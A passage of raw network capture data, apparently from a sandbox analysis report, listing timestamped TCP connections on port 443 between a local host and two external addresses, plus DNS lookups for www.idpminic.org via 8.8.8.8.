Nov 24, 2022 12:21:25.088938951 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.088952065 CET	443	49951	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.088998079 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.089256048 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.089282036 CET	443	49951	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.156328917 CET	49953	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.156409025 CET	443	49953	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.156523943 CET	49953	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.156773090 CET	49953	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.156799078 CET	443	49953	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.156863928 CET	443	49953	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.205328941 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.205394030 CET	443	49954	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.205604076 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.206257105 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.206281900 CET	443	49954	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.255192041 CET	443	49954	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.255306005 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.256999969 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.257045984 CET	443	49954	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.261502981 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.261574984 CET	443	49954	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.267080069 CET	49955	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.267142057 CET	443	49955	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.267288923 CET	49955	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.267541885 CET	49955	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.267564058 CET	443	49955	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.267635107 CET	443	49955	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.390292883 CET	49956	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.390361071 CET	443	49956	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.390502930 CET	49956	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.391163111 CET	443	49954	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.391227961 CET	49956	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.391249895 CET	443	49956	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.391282082 CET	443	49954	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.391288996 CET	443	49956	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.391320944 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.394188881 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.397984028 CET	49954	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.398040056 CET	443	49954	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.506934881 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.507045984 CET	443	49957	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.509162903 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.514497995 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.514569044 CET	443	49957	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.567792892 CET	443	49957	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.570936918 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.570936918 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.570983887 CET	443	49957	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.574945927 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.575026035 CET	443	49957	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.612540007 CET	49958	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.612617970 CET	443	49958	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.613079071 CET	49958	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.613079071 CET	49958	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.613137007 CET	443	49958	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.613281965 CET	443	49958	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.688371897 CET	443	49957	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.688575029 CET	443	49957	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.689057112 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.689057112 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.801770926 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.801831007 CET	443	49959	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.802212954 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.802304029 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.802318096 CET	443	49959	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.829408884 CET	49960	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.829477072 CET	443	49960	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.829883099 CET	49960	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.829883099 CET	49960	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.829935074 CET	443	49960	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.830094099 CET	443	49960	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.850615025 CET	443	49959	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.850976944 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.851727009 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.851743937 CET	443	49959	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.856575966 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.856602907 CET	443	49959	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.970072031 CET	443	49959	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.970364094 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.970391035 CET	443	49959	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.970587015 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.970587015 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:25.970658064 CET	443	49959	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.970841885 CET	49959	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.046766043 CET	49961	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.046853065 CET	443	49961	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.047236919 CET	49961	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.047236919 CET	49961	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.047298908 CET	443	49961	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.047421932 CET	443	49961	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.093528032 CET	49957	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.093566895 CET	443	49957	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.098929882 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.099004030 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.099205017 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.100012064 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.100047112 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.148540974 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.148729086 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.155150890 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.155178070 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.155821085 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.159153938 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.159739017 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.159756899 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.204359055 CET	49963	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.204410076 CET	443	49963	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.204518080 CET	49963	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.204816103 CET	49963	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.204829931 CET	443	49963	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.204874039 CET	443	49963	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.262820959 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.263210058 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.263231993 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.264477015 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.264477015 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.264588118 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.265008926 CET	443	49962	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.266866922 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.266866922 CET	49962	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.377763033 CET	49964	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.377824068 CET	443	49964	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.378062963 CET	49964	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.378273964 CET	49964	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.378302097 CET	443	49964	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.378367901 CET	443	49964	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.380232096 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.380286932 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.380404949 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.381885052 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.381916046 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.428503036 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.428735971 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.434060097 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.434075117 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.434547901 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.434631109 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.435332060 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.435343981 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.549895048 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.549994946 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.550123930 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.550401926 CET	49965	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.550434113 CET	443	49965	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.593517065 CET	49966	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.593569994 CET	443	49966	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.593808889 CET	49966	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.593995094 CET	49966	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.594012976 CET	443	49966	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.594070911 CET	443	49966	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.665718079 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.665788889 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.665879011 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.666713953 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.666738987 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.713737965 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.715353012 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.715981960 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.715998888 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.719408035 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:26.719436884 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:26.766061068 CET	49968	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.766119003 CET	443	49968	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.766204119 CET	49968	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.766448975 CET	49968	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.766479015 CET	443	49968	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.766540051 CET	443	49968	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.937544107 CET	49969	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.937603951 CET	443	49969	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.937701941 CET	49969	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.937964916 CET	49969	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:26.937983990 CET	443	49969	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:26.938049078 CET	443	49969	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.142741919 CET	49970	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.142800093 CET	443	49970	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.143040895 CET	49970	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.143244028 CET	49970	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.143266916 CET	443	49970	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.143318892 CET	443	49970	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.299863100 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.299942970 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.299969912 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.300014019 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.300026894 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.300236940 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.300252914 CET	443	49967	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.300270081 CET	49967	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.360310078 CET	49971	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.360379934 CET	443	49971	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.360474110 CET	49971	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.360677958 CET	49971	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.360696077 CET	443	49971	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.360779047 CET	443	49971	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.418356895 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.418472052 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.418644905 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.419800043 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.419850111 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.463476896 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.463828087 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.464670897 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.464695930 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.469790936 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.469851971 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.516047001 CET	49973	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.516109943 CET	443	49973	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.516217947 CET	49973	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.516520023 CET	49973	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.516537905 CET	443	49973	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.516596079 CET	443	49973	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.575989962 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.585426092 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.585481882 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.585700989 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.585768938 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.585877895 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.586143970 CET	443	49972	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.586237907 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.586456060 CET	49972	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.688225031 CET	49974	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.688298941 CET	443	49974	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.688445091 CET	49974	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.688728094 CET	49974	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.688741922 CET	443	49974	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.691025972 CET	443	49974	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.692094088 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.692178011 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.692606926 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.693224907 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.693248987 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.740289927 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.740416050 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.747205973 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.747260094 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.747746944 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.747989893 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.748835087 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.748861074 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.796952009 CET	49976	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.797014952 CET	443	49976	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.797157049 CET	49976	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.797410011 CET	49976	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.797425985 CET	443	49976	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.797481060 CET	443	49976	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.850532055 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.850621939 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.850652933 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.850779057 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.850972891 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.851031065 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.851284981 CET	443	49975	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.851361990 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.851386070 CET	49975	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.906358957 CET	49977	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.906419992 CET	443	49977	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.909498930 CET	49977	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.909821987 CET	49977	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:27.909851074 CET	443	49977	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.909905910 CET	443	49977	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:27.956482887 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.956546068 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:27.956686974 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.957264900 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:27.957295895 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.007263899 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.007361889 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.013396025 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.013416052 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.013959885 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.014058113 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.014745951 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.014765978 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.062637091 CET	49979	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.062724113 CET	443	49979	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:28.062855005 CET	49979	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.063148975 CET	49979	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.063180923 CET	443	49979	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:28.063227892 CET	443	49979	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:28.127804041 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.127897978 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.128046989 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.128596067 CET	49978	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.128627062 CET	443	49978	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.235591888 CET	49980	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.235656023 CET	443	49980	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:28.235789061 CET	49980	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.236036062 CET	49980	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.236053944 CET	443	49980	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:28.236104965 CET	443	49980	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:28.241497993 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.241559982 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.241718054 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.242187977 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.242221117 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.288876057 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.288974047 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.289683104 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.289695978 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.294118881 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:28.294145107 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:28.453834057 CET	49982	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.453901052 CET	443	49982	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:28.454221964 CET	49982	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.454221964 CET	49982	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:28.454278946 CET	443	49982	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:28.454411983 CET	443	49982	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:29.138233900 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:29.138379097 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:29.138398886 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:29.139951944 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:29.360657930 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:29.360743999 CET	443	49981	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:29.360800028 CET	49981	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:29.360855103 CET	49981	443	192.168.2.3	172.66.43.60

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2022 12:19:59.377954006 CET	57990	53	192.168.2.3	8.8.8.8
Nov 24, 2022 12:19:59.398948908 CET	53	57990	8.8.8.8	192.168.2.3
Nov 24, 2022 12:19:59.414992094 CET	52387	53	192.168.2.3	8.8.8.8
Nov 24, 2022 12:19:59.432938099 CET	53	52387	8.8.8.8	192.168.2.3
Nov 24, 2022 12:20:02.110168934 CET	56924	53	192.168.2.3	8.8.8.8
Nov 24, 2022 12:20:02.127485991 CET	53	56924	8.8.8.8	192.168.2.3
Nov 24, 2022 12:20:02.135557890 CET	60625	53	192.168.2.3	8.8.8.8
Nov 24, 2022 12:20:02.154782057 CET	53	60625	8.8.8.8	192.168.2.3
Nov 24, 2022 12:20:02.752621889 CET	49302	53	192.168.2.3	8.8.8.8
Nov 24, 2022 12:20:02.770612955 CET	53	49302	8.8.8.8	192.168.2.3
Nov 24, 2022 12:20:02.781203032 CET	53975	53	192.168.2.3	8.8.8.8
Nov 24, 2022 12:20:02.951100111 CET	53	53975	8.8.8.8	192.168.2.3
Nov 24, 2022 12:20:12.290323973 CET	51139	53	192.168.2.3	8.8.8.8
Nov 24, 2022 12:20:12.309691906 CET	53	51139	8.8.8.8	192.168.2.3
Nov 24, 2022 12:20:41.379933119 CET	52955	53	192.168.2.3	8.8.8.8
Nov 24, 2022 12:20:41.403631926 CET	53	52955	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 24, 2022 12:19:59.377954006 CET	192.168.2.3	8.8.8.8	0x9237	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:19:59.414992094 CET	192.168.2.3	8.8.8.8	0x475f	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:02.110168934 CET	192.168.2.3	8.8.8.8	0xa2a	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
Nov 24, 2022 12:20:02.135557890 CET	192.168.2.3	8.8.8.8	0x96c7	Standard query (0)	www.idpminic.org	A (IP address)	IN (0x0001)	false
